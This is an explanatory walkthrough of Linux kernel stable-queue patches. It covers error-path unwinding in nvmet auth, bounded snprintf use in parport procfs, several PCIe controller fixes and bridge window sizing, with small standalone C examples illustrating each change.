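The nvme_prep_rq() fix keeps the error path symmetric with setup: data is only mapped when the request has physical segments, so the unwind must be guarded by the same condition or it would undo state that was never created. Sketched generically (the struct and helpers are made up for illustration):

#include <stdbool.h>
#include <stdio.h>

struct request { int nr_segments; bool mapped; };

static int map_data(struct request *req)    { req->mapped = true; return 0; }
static void unmap_data(struct request *req) { req->mapped = false; }

/* Error unwind mirrors setup: only undo a step that actually ran. */
static int prep_rq(struct request *req, bool fail_later)
{
	if (req->nr_segments && map_data(req))
		return -1;

	if (fail_later)
		goto out_unmap_data;
	return 0;

out_unmap_data:
	if (req->nr_segments)	/* same condition that guarded map_data() */
		unmap_data(req);
	return -1;
}

int main(void)
{
	struct request req = { .nr_segments = 0 };

	prep_rq(&req, true);	/* no segments: nothing mapped, nothing unmapped */
	printf("mapped=%d\n", req.mapped);
	return 0;
}
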
+diff --git a/drivers/nvme/target/auth.c b/drivers/nvme/target/auth.c
+index e900525b78665..aacc05ec00c2b 100644
+--- a/drivers/nvme/target/auth.c
++++ b/drivers/nvme/target/auth.c
+@@ -314,7 +314,7 @@ int nvmet_auth_host_hash(struct nvmet_req *req, u8 *response,
+ 						    req->sq->dhchap_c1,
+ 						    challenge, shash_len);
+ 		if (ret)
+-			goto out_free_response;
++			goto out_free_challenge;
+ 	}
+ 
+ 	pr_debug("ctrl %d qid %d host response seq %u transaction %d\n",
+@@ -325,7 +325,7 @@ int nvmet_auth_host_hash(struct nvmet_req *req, u8 *response,
+ 			GFP_KERNEL);
+ 	if (!shash) {
+ 		ret = -ENOMEM;
+-		goto out_free_response;
++		goto out_free_challenge;
+ 	}
+ 	shash->tfm = shash_tfm;
+ 	ret = crypto_shash_init(shash);
+@@ -361,9 +361,10 @@ int nvmet_auth_host_hash(struct nvmet_req *req, u8 *response,
+ 		goto out;
+ 	ret = crypto_shash_final(shash, response);
+ out:
++	kfree(shash);
++out_free_challenge:
+ 	if (challenge != req->sq->dhchap_c1)
+ 		kfree(challenge);
+-	kfree(shash);
+ out_free_response:
+ 	kfree_sensitive(host_response);
+ out_free_tfm:
+@@ -426,14 +427,14 @@ int nvmet_auth_ctrl_hash(struct nvmet_req *req, u8 *response,
+ 						    req->sq->dhchap_c2,
+ 						    challenge, shash_len);
+ 		if (ret)
+-			goto out_free_response;
++			goto out_free_challenge;
+ 	}
+ 
+ 	shash = kzalloc(sizeof(*shash) + crypto_shash_descsize(shash_tfm),
+ 			GFP_KERNEL);
+ 	if (!shash) {
+ 		ret = -ENOMEM;
+-		goto out_free_response;
++		goto out_free_challenge;
+ 	}
+ 	shash->tfm = shash_tfm;
+ 
+@@ -470,9 +471,10 @@ int nvmet_auth_ctrl_hash(struct nvmet_req *req, u8 *response,
+ 		goto out;
+ 	ret = crypto_shash_final(shash, response);
+ out:
++	kfree(shash);
++out_free_challenge:
+ 	if (challenge != req->sq->dhchap_c2)
+ 		kfree(challenge);
+-	kfree(shash);
+ out_free_response:
+ 	kfree_sensitive(ctrl_response);
+ out_free_tfm:
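
Both nvmet hash routines get the same treatment: a new out_free_challenge label so the (possibly reallocated) challenge buffer is freed on every path that allocated it, with kfree(shash) moved ahead so teardown runs in strict reverse order of setup. The general ladder, reduced to a standalone example:

#include <stdlib.h>

/* Reverse-order error unwind with one label per allocation. */
static int do_work(void)
{
	int ret = -1;
	char *response, *challenge, *shash;

	response = malloc(32);
	if (!response)
		return -1;

	challenge = malloc(64);
	if (!challenge)
		goto out_free_response;

	shash = malloc(128);
	if (!shash)
		goto out_free_challenge;

	/* ... use the buffers ... */
	ret = 0;

	free(shash);
out_free_challenge:
	free(challenge);
out_free_response:
	free(response);
	return ret;
}

int main(void)
{
	return do_work();
}
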
+diff --git a/drivers/opp/ti-opp-supply.c b/drivers/opp/ti-opp-supply.c
+index 8f3f13fbbb25a..a8a696d2e03ab 100644
+--- a/drivers/opp/ti-opp-supply.c
++++ b/drivers/opp/ti-opp-supply.c
+@@ -400,10 +400,12 @@ static int ti_opp_supply_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	ret = dev_pm_opp_set_config_regulators(cpu_dev, ti_opp_config_regulators);
+-	if (ret < 0)
++	if (ret < 0) {
+ 		_free_optimized_voltages(dev, &opp_data);
++		return ret;
++	}
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static struct platform_driver ti_opp_supply_driver = {
+diff --git a/drivers/parport/procfs.c b/drivers/parport/procfs.c
+index d740eba3c0999..8400a379186ea 100644
+--- a/drivers/parport/procfs.c
++++ b/drivers/parport/procfs.c
+@@ -51,12 +51,12 @@ static int do_active_device(struct ctl_table *table, int write,
+ 	
+ 	for (dev = port->devices; dev ; dev = dev->next) {
+ 		if(dev == port->cad) {
+-			len += sprintf(buffer, "%s\n", dev->name);
++			len += snprintf(buffer, sizeof(buffer), "%s\n", dev->name);
+ 		}
+ 	}
+ 
+ 	if(!len) {
+-		len += sprintf(buffer, "%s\n", "none");
++		len += snprintf(buffer, sizeof(buffer), "%s\n", "none");
+ 	}
+ 
+ 	if (len > *lenp)
+@@ -87,19 +87,19 @@ static int do_autoprobe(struct ctl_table *table, int write,
+ 	}
+ 	
+ 	if ((str = info->class_name) != NULL)
+-		len += sprintf (buffer + len, "CLASS:%s;\n", str);
++		len += snprintf (buffer + len, sizeof(buffer) - len, "CLASS:%s;\n", str);
+ 
+ 	if ((str = info->model) != NULL)
+-		len += sprintf (buffer + len, "MODEL:%s;\n", str);
++		len += snprintf (buffer + len, sizeof(buffer) - len, "MODEL:%s;\n", str);
+ 
+ 	if ((str = info->mfr) != NULL)
+-		len += sprintf (buffer + len, "MANUFACTURER:%s;\n", str);
++		len += snprintf (buffer + len, sizeof(buffer) - len, "MANUFACTURER:%s;\n", str);
+ 
+ 	if ((str = info->description) != NULL)
+-		len += sprintf (buffer + len, "DESCRIPTION:%s;\n", str);
++		len += snprintf (buffer + len, sizeof(buffer) - len, "DESCRIPTION:%s;\n", str);
+ 
+ 	if ((str = info->cmdset) != NULL)
+-		len += sprintf (buffer + len, "COMMAND SET:%s;\n", str);
++		len += snprintf (buffer + len, sizeof(buffer) - len, "COMMAND SET:%s;\n", str);
+ 
+ 	if (len > *lenp)
+ 		len = *lenp;
+@@ -117,7 +117,7 @@ static int do_hardware_base_addr(struct ctl_table *table, int write,
+ 				 void *result, size_t *lenp, loff_t *ppos)
+ {
+ 	struct parport *port = (struct parport *)table->extra1;
+-	char buffer[20];
++	char buffer[64];
+ 	int len = 0;
+ 
+ 	if (*ppos) {
+@@ -128,7 +128,7 @@ static int do_hardware_base_addr(struct ctl_table *table, int write,
+ 	if (write) /* permissions prevent this anyway */
+ 		return -EACCES;
+ 
+-	len += sprintf (buffer, "%lu\t%lu\n", port->base, port->base_hi);
++	len += snprintf (buffer, sizeof(buffer), "%lu\t%lu\n", port->base, port->base_hi);
+ 
+ 	if (len > *lenp)
+ 		len = *lenp;
+@@ -155,7 +155,7 @@ static int do_hardware_irq(struct ctl_table *table, int write,
+ 	if (write) /* permissions prevent this anyway */
+ 		return -EACCES;
+ 
+-	len += sprintf (buffer, "%d\n", port->irq);
++	len += snprintf (buffer, sizeof(buffer), "%d\n", port->irq);
+ 
+ 	if (len > *lenp)
+ 		len = *lenp;
+@@ -182,7 +182,7 @@ static int do_hardware_dma(struct ctl_table *table, int write,
+ 	if (write) /* permissions prevent this anyway */
+ 		return -EACCES;
+ 
+-	len += sprintf (buffer, "%d\n", port->dma);
++	len += snprintf (buffer, sizeof(buffer), "%d\n", port->dma);
+ 
+ 	if (len > *lenp)
+ 		len = *lenp;
+@@ -213,7 +213,7 @@ static int do_hardware_modes(struct ctl_table *table, int write,
+ #define printmode(x)							\
+ do {									\
+ 	if (port->modes & PARPORT_MODE_##x)				\
+-		len += sprintf(buffer + len, "%s%s", f++ ? "," : "", #x); \
++		len += snprintf(buffer + len, sizeof(buffer) - len, "%s%s", f++ ? "," : "", #x); \
+ } while (0)
+ 		int f = 0;
+ 		printmode(PCSPP);
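
Every sprintf() into the fixed on-stack buffer becomes a bounded snprintf(), with buffer + len / sizeof(buffer) - len advancing through the remaining space, and the base-address buffer grows from 20 to 64 bytes. The accumulation pattern in isolation:

#include <stdio.h>

/* Bounded accumulation into a fixed buffer: each call only gets the
 * space that is still left, so a long string cannot overrun it. */
int main(void)
{
	char buffer[64];
	int len = 0;

	len += snprintf(buffer + len, sizeof(buffer) - len,
			"CLASS:%s;\n", "PRINTER");
	len += snprintf(buffer + len, sizeof(buffer) - len,
			"MODEL:%s;\n", "LaserWriter");
	printf("%s", buffer);
	return 0;
}

One caveat worth knowing: snprintf() returns the length it would have written, so after truncation len can exceed the buffer size and sizeof(buffer) - len underflows as a size_t; kernel code that cares about this uses scnprintf(), whose return value never exceeds the space actually given.
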
+diff --git a/drivers/pci/controller/dwc/pci-keystone.c b/drivers/pci/controller/dwc/pci-keystone.c
+index 7ecad72cff7e7..6007ffcb4752a 100644
+--- a/drivers/pci/controller/dwc/pci-keystone.c
++++ b/drivers/pci/controller/dwc/pci-keystone.c
+@@ -247,8 +247,68 @@ static struct irq_chip ks_pcie_msi_irq_chip = {
+ 	.irq_unmask = ks_pcie_msi_unmask,
+ };
+ 
++/**
++ * ks_pcie_set_dbi_mode() - Set DBI mode to access overlaid BAR mask registers
++ * @ks_pcie: A pointer to the keystone_pcie structure which holds the KeyStone
++ *	     PCIe host controller driver information.
++ *
++ * Since modification of dbi_cs2 involves different clock domain, read the
++ * status back to ensure the transition is complete.
++ */
++static void ks_pcie_set_dbi_mode(struct keystone_pcie *ks_pcie)
++{
++	u32 val;
++
++	val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
++	val |= DBI_CS2;
++	ks_pcie_app_writel(ks_pcie, CMD_STATUS, val);
++
++	do {
++		val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
++	} while (!(val & DBI_CS2));
++}
++
++/**
++ * ks_pcie_clear_dbi_mode() - Disable DBI mode
++ * @ks_pcie: A pointer to the keystone_pcie structure which holds the KeyStone
++ *	     PCIe host controller driver information.
++ *
++ * Since modification of dbi_cs2 involves different clock domain, read the
++ * status back to ensure the transition is complete.
++ */
++static void ks_pcie_clear_dbi_mode(struct keystone_pcie *ks_pcie)
++{
++	u32 val;
++
++	val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
++	val &= ~DBI_CS2;
++	ks_pcie_app_writel(ks_pcie, CMD_STATUS, val);
++
++	do {
++		val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
++	} while (val & DBI_CS2);
++}
++
+ static int ks_pcie_msi_host_init(struct dw_pcie_rp *pp)
+ {
++	struct dw_pcie *pci = to_dw_pcie_from_pp(pp);
++	struct keystone_pcie *ks_pcie = to_keystone_pcie(pci);
++
++	/* Configure and set up BAR0 */
++	ks_pcie_set_dbi_mode(ks_pcie);
++
++	/* Enable BAR0 */
++	dw_pcie_writel_dbi(pci, PCI_BASE_ADDRESS_0, 1);
++	dw_pcie_writel_dbi(pci, PCI_BASE_ADDRESS_0, SZ_4K - 1);
++
++	ks_pcie_clear_dbi_mode(ks_pcie);
++
++	/*
++	 * For BAR0, just setting bus address for inbound writes (MSI) should
++	 * be sufficient.  Use physical address to avoid any conflicts.
++	 */
++	dw_pcie_writel_dbi(pci, PCI_BASE_ADDRESS_0, ks_pcie->app.start);
++
+ 	pp->msi_irq_chip = &ks_pcie_msi_irq_chip;
+ 	return dw_pcie_allocate_domains(pp);
+ }
+@@ -343,59 +403,22 @@ static const struct irq_domain_ops ks_pcie_legacy_irq_domain_ops = {
+ 	.xlate = irq_domain_xlate_onetwocell,
+ };
+ 
+-/**
+- * ks_pcie_set_dbi_mode() - Set DBI mode to access overlaid BAR mask registers
+- * @ks_pcie: A pointer to the keystone_pcie structure which holds the KeyStone
+- *	     PCIe host controller driver information.
+- *
+- * Since modification of dbi_cs2 involves different clock domain, read the
+- * status back to ensure the transition is complete.
+- */
+-static void ks_pcie_set_dbi_mode(struct keystone_pcie *ks_pcie)
+-{
+-	u32 val;
+-
+-	val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
+-	val |= DBI_CS2;
+-	ks_pcie_app_writel(ks_pcie, CMD_STATUS, val);
+-
+-	do {
+-		val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
+-	} while (!(val & DBI_CS2));
+-}
+-
+-/**
+- * ks_pcie_clear_dbi_mode() - Disable DBI mode
+- * @ks_pcie: A pointer to the keystone_pcie structure which holds the KeyStone
+- *	     PCIe host controller driver information.
+- *
+- * Since modification of dbi_cs2 involves different clock domain, read the
+- * status back to ensure the transition is complete.
+- */
+-static void ks_pcie_clear_dbi_mode(struct keystone_pcie *ks_pcie)
+-{
+-	u32 val;
+-
+-	val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
+-	val &= ~DBI_CS2;
+-	ks_pcie_app_writel(ks_pcie, CMD_STATUS, val);
+-
+-	do {
+-		val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
+-	} while (val & DBI_CS2);
+-}
+-
+-static void ks_pcie_setup_rc_app_regs(struct keystone_pcie *ks_pcie)
++static int ks_pcie_setup_rc_app_regs(struct keystone_pcie *ks_pcie)
+ {
+ 	u32 val;
+ 	u32 num_viewport = ks_pcie->num_viewport;
+ 	struct dw_pcie *pci = ks_pcie->pci;
+ 	struct dw_pcie_rp *pp = &pci->pp;
+-	u64 start, end;
++	struct resource_entry *entry;
+ 	struct resource *mem;
++	u64 start, end;
+ 	int i;
+ 
+-	mem = resource_list_first_type(&pp->bridge->windows, IORESOURCE_MEM)->res;
++	entry = resource_list_first_type(&pp->bridge->windows, IORESOURCE_MEM);
++	if (!entry)
++		return -ENODEV;
++
++	mem = entry->res;
+ 	start = mem->start;
+ 	end = mem->end;
+ 
+@@ -406,7 +429,7 @@ static void ks_pcie_setup_rc_app_regs(struct keystone_pcie *ks_pcie)
+ 	ks_pcie_clear_dbi_mode(ks_pcie);
+ 
+ 	if (ks_pcie->is_am6)
+-		return;
++		return 0;
+ 
+ 	val = ilog2(OB_WIN_SIZE);
+ 	ks_pcie_app_writel(ks_pcie, OB_SIZE, val);
+@@ -423,6 +446,8 @@ static void ks_pcie_setup_rc_app_regs(struct keystone_pcie *ks_pcie)
+ 	val = ks_pcie_app_readl(ks_pcie, CMD_STATUS);
+ 	val |= OB_XLAT_EN_VAL;
+ 	ks_pcie_app_writel(ks_pcie, CMD_STATUS, val);
++
++	return 0;
+ }
+ 
+ static void __iomem *ks_pcie_other_map_bus(struct pci_bus *bus,
+@@ -448,44 +473,10 @@ static struct pci_ops ks_child_pcie_ops = {
+ 	.write = pci_generic_config_write,
+ };
+ 
+-/**
+- * ks_pcie_v3_65_add_bus() - keystone add_bus post initialization
+- * @bus: A pointer to the PCI bus structure.
+- *
+- * This sets BAR0 to enable inbound access for MSI_IRQ register
+- */
+-static int ks_pcie_v3_65_add_bus(struct pci_bus *bus)
+-{
+-	struct dw_pcie_rp *pp = bus->sysdata;
+-	struct dw_pcie *pci = to_dw_pcie_from_pp(pp);
+-	struct keystone_pcie *ks_pcie = to_keystone_pcie(pci);
+-
+-	if (!pci_is_root_bus(bus))
+-		return 0;
+-
+-	/* Configure and set up BAR0 */
+-	ks_pcie_set_dbi_mode(ks_pcie);
+-
+-	/* Enable BAR0 */
+-	dw_pcie_writel_dbi(pci, PCI_BASE_ADDRESS_0, 1);
+-	dw_pcie_writel_dbi(pci, PCI_BASE_ADDRESS_0, SZ_4K - 1);
+-
+-	ks_pcie_clear_dbi_mode(ks_pcie);
+-
+-	 /*
+-	  * For BAR0, just setting bus address for inbound writes (MSI) should
+-	  * be sufficient.  Use physical address to avoid any conflicts.
+-	  */
+-	dw_pcie_writel_dbi(pci, PCI_BASE_ADDRESS_0, ks_pcie->app.start);
+-
+-	return 0;
+-}
+-
+ static struct pci_ops ks_pcie_ops = {
+ 	.map_bus = dw_pcie_own_conf_map_bus,
+ 	.read = pci_generic_config_read,
+ 	.write = pci_generic_config_write,
+-	.add_bus = ks_pcie_v3_65_add_bus,
+ };
+ 
+ /**
+@@ -818,7 +809,10 @@ static int __init ks_pcie_host_init(struct dw_pcie_rp *pp)
+ 		return ret;
+ 
+ 	ks_pcie_stop_link(pci);
+-	ks_pcie_setup_rc_app_regs(ks_pcie);
++	ret = ks_pcie_setup_rc_app_regs(ks_pcie);
++	if (ret)
++		return ret;
++
+ 	writew(PCI_IO_RANGE_TYPE_32 | (PCI_IO_RANGE_TYPE_32 << 8),
+ 			pci->dbi_base + PCI_IO_BASE);
+ 
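
The keystone rework moves BAR0 programming out of the add_bus callback into msi_host_init, tying it to the MSI setup it exists for, and keeps the DBI_CS2 set/clear helpers that poll the bit back after writing it, because the mode switch crosses a clock domain. The write-then-poll shape, with stand-in accessors (the bit position is illustrative only):

#include <stdint.h>
#include <stdio.h>

/* Stand-ins for ks_pcie_app_readl()/_writel(); plain memory here. */
static volatile uint32_t cmd_status;
static uint32_t app_readl(void)    { return cmd_status; }
static void app_writel(uint32_t v) { cmd_status = v; }

#define DBI_CS2 (1u << 5)	/* illustrative bit position */

/* The mode switch crosses a clock domain, so the write alone proves
 * nothing: poll the bit back until the other domain has taken it. */
static void set_dbi_mode(void)
{
	uint32_t val = app_readl();

	app_writel(val | DBI_CS2);
	do {
		val = app_readl();
	} while (!(val & DBI_CS2));
}

int main(void)
{
	set_dbi_mode();
	printf("CMD_STATUS = 0x%08x\n", (unsigned int)cmd_status);
	return 0;
}
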
+diff --git a/drivers/pci/controller/dwc/pcie-designware-ep.c b/drivers/pci/controller/dwc/pcie-designware-ep.c
+index 506d6d061d4cd..449ad709495d3 100644
+--- a/drivers/pci/controller/dwc/pcie-designware-ep.c
++++ b/drivers/pci/controller/dwc/pcie-designware-ep.c
+@@ -165,7 +165,7 @@ static int dw_pcie_ep_inbound_atu(struct dw_pcie_ep *ep, u8 func_no, int type,
+ 	if (!ep->bar_to_atu[bar])
+ 		free_win = find_first_zero_bit(ep->ib_window_map, pci->num_ib_windows);
+ 	else
+-		free_win = ep->bar_to_atu[bar];
++		free_win = ep->bar_to_atu[bar] - 1;
+ 
+ 	if (free_win >= pci->num_ib_windows) {
+ 		dev_err(pci->dev, "No free inbound window\n");
+@@ -179,7 +179,11 @@ static int dw_pcie_ep_inbound_atu(struct dw_pcie_ep *ep, u8 func_no, int type,
+ 		return ret;
+ 	}
+ 
+-	ep->bar_to_atu[bar] = free_win;
++	/*
++	 * Always increment free_win before assignment, since value 0 is used to identify
++	 * unallocated mapping.
++	 */
++	ep->bar_to_atu[bar] = free_win + 1;
+ 	set_bit(free_win, ep->ib_window_map);
+ 
+ 	return 0;
+@@ -216,7 +220,10 @@ static void dw_pcie_ep_clear_bar(struct pci_epc *epc, u8 func_no, u8 vfunc_no,
+ 	struct dw_pcie_ep *ep = epc_get_drvdata(epc);
+ 	struct dw_pcie *pci = to_dw_pcie_from_ep(ep);
+ 	enum pci_barno bar = epf_bar->barno;
+-	u32 atu_index = ep->bar_to_atu[bar];
++	u32 atu_index = ep->bar_to_atu[bar] - 1;
++
++	if (!ep->bar_to_atu[bar])
++		return;
+ 
+ 	__dw_pcie_ep_reset_bar(pci, func_no, bar, epf_bar->flags);
+ 
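
dw_pcie_ep_inbound_atu() now stores free_win + 1 in bar_to_atu[], reserving 0 to mean "no window allocated"; without the offset, a BAR legitimately mapped to window 0 was indistinguishable from an untouched slot, and clear_bar could tear down window 0 for BARs that were never set. The encoding in miniature:

#include <assert.h>

#define NO_WIN 0	/* slot value 0 means "unallocated" */

static unsigned int bar_to_atu[6];

static void assign_window(int bar, unsigned int win)
{
	bar_to_atu[bar] = win + 1;	/* store index + 1 */
}

static int lookup_window(int bar)
{
	if (bar_to_atu[bar] == NO_WIN)
		return -1;		/* nothing to free or reuse */
	return bar_to_atu[bar] - 1;	/* decode back to the index */
}

int main(void)
{
	assign_window(2, 0);		/* window 0 is a valid index */
	assert(lookup_window(2) == 0);
	assert(lookup_window(3) == -1);	/* untouched slot reads as free */
	return 0;
}
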
+diff --git a/drivers/pci/controller/dwc/pcie-dw-rockchip.c b/drivers/pci/controller/dwc/pcie-dw-rockchip.c
+index c1e7653e508e7..4332370fefa0e 100644
+--- a/drivers/pci/controller/dwc/pcie-dw-rockchip.c
++++ b/drivers/pci/controller/dwc/pcie-dw-rockchip.c
+@@ -240,7 +240,7 @@ static int rockchip_pcie_resource_get(struct platform_device *pdev,
+ 		return PTR_ERR(rockchip->apb_base);
+ 
+ 	rockchip->rst_gpio = devm_gpiod_get_optional(&pdev->dev, "reset",
+-						     GPIOD_OUT_HIGH);
++						     GPIOD_OUT_LOW);
+ 	if (IS_ERR(rockchip->rst_gpio))
+ 		return PTR_ERR(rockchip->rst_gpio);
+ 
+diff --git a/drivers/pci/controller/dwc/pcie-qcom-ep.c b/drivers/pci/controller/dwc/pcie-qcom-ep.c
+index 1c7fd05ce0280..f2bf3eba2254e 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom-ep.c
++++ b/drivers/pci/controller/dwc/pcie-qcom-ep.c
+@@ -446,12 +446,6 @@ static int qcom_pcie_perst_deassert(struct dw_pcie *pci)
+ static void qcom_pcie_perst_assert(struct dw_pcie *pci)
+ {
+ 	struct qcom_pcie_ep *pcie_ep = to_pcie_ep(pci);
+-	struct device *dev = pci->dev;
+-
+-	if (pcie_ep->link_status == QCOM_PCIE_EP_LINK_DISABLED) {
+-		dev_dbg(dev, "Link is already disabled\n");
+-		return;
+-	}
+ 
+ 	qcom_pcie_disable_resources(pcie_ep);
+ 	pcie_ep->link_status = QCOM_PCIE_EP_LINK_DISABLED;
+diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c
+index b36cbc9136ae1..09491d06589ee 100644
+--- a/drivers/pci/controller/pci-hyperv.c
++++ b/drivers/pci/controller/pci-hyperv.c
+@@ -1092,8 +1092,8 @@ static void _hv_pcifront_read_config(struct hv_pci_dev *hpdev, int where,
+ 		   PCI_CAPABILITY_LIST) {
+ 		/* ROM BARs are unimplemented */
+ 		*val = 0;
+-	} else if (where >= PCI_INTERRUPT_LINE && where + size <=
+-		   PCI_INTERRUPT_PIN) {
++	} else if ((where >= PCI_INTERRUPT_LINE && where + size <= PCI_INTERRUPT_PIN) ||
++		   (where >= PCI_INTERRUPT_PIN && where + size <= PCI_MIN_GNT)) {
+ 		/*
+ 		 * Interrupt Line and Interrupt PIN are hard-wired to zero
+ 		 * because this front-end only supports message-signaled
+diff --git a/drivers/pci/controller/pci-loongson.c b/drivers/pci/controller/pci-loongson.c
+index a860f25473df6..76f125d556ebb 100644
+--- a/drivers/pci/controller/pci-loongson.c
++++ b/drivers/pci/controller/pci-loongson.c
+@@ -163,6 +163,19 @@ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_LOONGSON,
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_LOONGSON,
+ 			DEV_LS7A_HDMI, loongson_pci_pin_quirk);
+ 
++static void loongson_pci_msi_quirk(struct pci_dev *dev)
++{
++	u16 val, class = dev->class >> 8;
++
++	if (class != PCI_CLASS_BRIDGE_HOST)
++		return;
++
++	pci_read_config_word(dev, dev->msi_cap + PCI_MSI_FLAGS, &val);
++	val |= PCI_MSI_FLAGS_ENABLE;
++	pci_write_config_word(dev, dev->msi_cap + PCI_MSI_FLAGS, val);
++}
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_LOONGSON, DEV_LS7A_PCIE_PORT5, loongson_pci_msi_quirk);
++
+ static struct loongson_pci *pci_bus_to_loongson_pci(struct pci_bus *bus)
+ {
+ 	struct pci_config_window *cfg;
+diff --git a/drivers/pci/controller/pcie-rcar-host.c b/drivers/pci/controller/pcie-rcar-host.c
+index e4faf90feaf5c..d0fe5076d9777 100644
+--- a/drivers/pci/controller/pcie-rcar-host.c
++++ b/drivers/pci/controller/pcie-rcar-host.c
+@@ -92,7 +92,11 @@ static int rcar_pcie_wakeup(struct device *pcie_dev, void __iomem *pcie_base)
+ 		writel(L1IATN, pcie_base + PMCTLR);
+ 		ret = readl_poll_timeout_atomic(pcie_base + PMSR, val,
+ 						val & L1FAEG, 10, 1000);
+-		WARN(ret, "Timeout waiting for L1 link state, ret=%d\n", ret);
++		if (ret) {
++			dev_warn_ratelimited(pcie_dev,
++					     "Timeout waiting for L1 link state, ret=%d\n",
++					     ret);
++		}
+ 		writel(L1FAEG | PMEL1RX, pcie_base + PMSR);
+ 	}
+ 
+diff --git a/drivers/pci/controller/pcie-rockchip.c b/drivers/pci/controller/pcie-rockchip.c
+index 1aa84035a8bc7..bdce1ba7c1bc0 100644
+--- a/drivers/pci/controller/pcie-rockchip.c
++++ b/drivers/pci/controller/pcie-rockchip.c
+@@ -120,7 +120,7 @@ int rockchip_pcie_parse_dt(struct rockchip_pcie *rockchip)
+ 
+ 	if (rockchip->is_rc) {
+ 		rockchip->ep_gpio = devm_gpiod_get_optional(dev, "ep",
+-							    GPIOD_OUT_HIGH);
++							    GPIOD_OUT_LOW);
+ 		if (IS_ERR(rockchip->ep_gpio))
+ 			return dev_err_probe(dev, PTR_ERR(rockchip->ep_gpio),
+ 					     "failed to get ep GPIO\n");
+diff --git a/drivers/pci/endpoint/functions/pci-epf-vntb.c b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+index b4c1a4f6029d4..6708d2e789cb4 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-vntb.c
++++ b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+@@ -813,8 +813,9 @@ static int epf_ntb_epc_init(struct epf_ntb *ntb)
+  */
+ static void epf_ntb_epc_cleanup(struct epf_ntb *ntb)
+ {
+-	epf_ntb_db_bar_clear(ntb);
+ 	epf_ntb_mw_bar_clear(ntb, ntb->num_mws);
++	epf_ntb_db_bar_clear(ntb);
++	epf_ntb_config_sspad_bar_clear(ntb);
+ }
+ 
+ #define EPF_NTB_R(_name)						\
+@@ -1032,8 +1033,10 @@ static int vpci_scan_bus(void *sysdata)
+ 	struct epf_ntb *ndev = sysdata;
+ 
+ 	vpci_bus = pci_scan_bus(ndev->vbus_number, &vpci_ops, sysdata);
+-	if (vpci_bus)
+-		pr_err("create pci bus\n");
++	if (!vpci_bus) {
++		pr_err("create pci bus failed\n");
++		return -EINVAL;
++	}
+ 
+ 	pci_bus_add_devices(vpci_bus);
+ 
+@@ -1352,13 +1355,19 @@ static int epf_ntb_bind(struct pci_epf *epf)
+ 	ret = pci_register_driver(&vntb_pci_driver);
+ 	if (ret) {
+ 		dev_err(dev, "failure register vntb pci driver\n");
+-		goto err_bar_alloc;
++		goto err_epc_cleanup;
+ 	}
+ 
+-	vpci_scan_bus(ntb);
++	ret = vpci_scan_bus(ntb);
++	if (ret)
++		goto err_unregister;
+ 
+ 	return 0;
+ 
++err_unregister:
++	pci_unregister_driver(&vntb_pci_driver);
++err_epc_cleanup:
++	epf_ntb_epc_cleanup(ntb);
+ err_bar_alloc:
+ 	epf_ntb_config_spad_bar_free(ntb);
+ 
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 0399204941dbe..2d373ab3ccb38 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -5007,7 +5007,7 @@ static int pci_bus_max_d3cold_delay(const struct pci_bus *bus)
+ int pci_bridge_wait_for_secondary_bus(struct pci_dev *dev, char *reset_type,
+ 				      int timeout)
+ {
+-	struct pci_dev *child;
++	struct pci_dev *child __free(pci_dev_put) = NULL;
+ 	int delay;
+ 
+ 	if (pci_dev_is_disconnected(dev))
+@@ -5036,8 +5036,8 @@ int pci_bridge_wait_for_secondary_bus(struct pci_dev *dev, char *reset_type,
+ 		return 0;
+ 	}
+ 
+-	child = list_first_entry(&dev->subordinate->devices, struct pci_dev,
+-				 bus_list);
++	child = pci_dev_get(list_first_entry(&dev->subordinate->devices,
++					     struct pci_dev, bus_list));
+ 	up_read(&pci_bus_sem);
+ 
+ 	/*
+diff --git a/drivers/pci/setup-bus.c b/drivers/pci/setup-bus.c
+index c690572b10ce7..b8cb990044fb2 100644
+--- a/drivers/pci/setup-bus.c
++++ b/drivers/pci/setup-bus.c
+@@ -824,11 +824,9 @@ static resource_size_t calculate_memsize(resource_size_t size,
+ 		size = min_size;
+ 	if (old_size == 1)
+ 		old_size = 0;
+-	if (size < old_size)
+-		size = old_size;
+ 
+-	size = ALIGN(max(size, add_size) + children_add_size, align);
+-	return size;
++	size = max(size, add_size) + children_add_size;
++	return ALIGN(max(size, old_size), align);
+ }
+ 
+ resource_size_t __weak pcibios_window_alignment(struct pci_bus *bus,
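
calculate_memsize() previously folded old_size into size before children_add_size was added, so on a remove-and-rescan the existing window size was counted on top of the re-added children and the window could only grow. The reordered version adds the children first and uses old_size only as a floor at the final alignment. A small check of both variants (sizes in MiB, alignment 1 MiB):

#include <stdio.h>

typedef unsigned long long rsz_t;

static rsz_t align_up(rsz_t x, rsz_t a) { return (x + a - 1) & ~(a - 1); }

static rsz_t memsize_old(rsz_t size, rsz_t old, rsz_t add, rsz_t child, rsz_t a)
{
	if (size < old)
		size = old;			/* old size folded in early */
	return align_up((size > add ? size : add) + child, a);
}

static rsz_t memsize_new(rsz_t size, rsz_t old, rsz_t add, rsz_t child, rsz_t a)
{
	size = (size > add ? size : add) + child;	/* children first */
	return align_up(size > old ? size : old, a);	/* old only as a floor */
}

int main(void)
{
	rsz_t M = 1 << 20;

	/* rescan: the bus already has a 2M window, children re-add 1M */
	printf("old: %lluM\n", memsize_old(1 * M, 2 * M, 0, 1 * M, M) / M); /* 3M */
	printf("new: %lluM\n", memsize_new(1 * M, 2 * M, 0, 1 * M, M) / M); /* 2M */
	return 0;
}
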
+diff --git a/drivers/phy/cadence/phy-cadence-torrent.c b/drivers/phy/cadence/phy-cadence-torrent.c
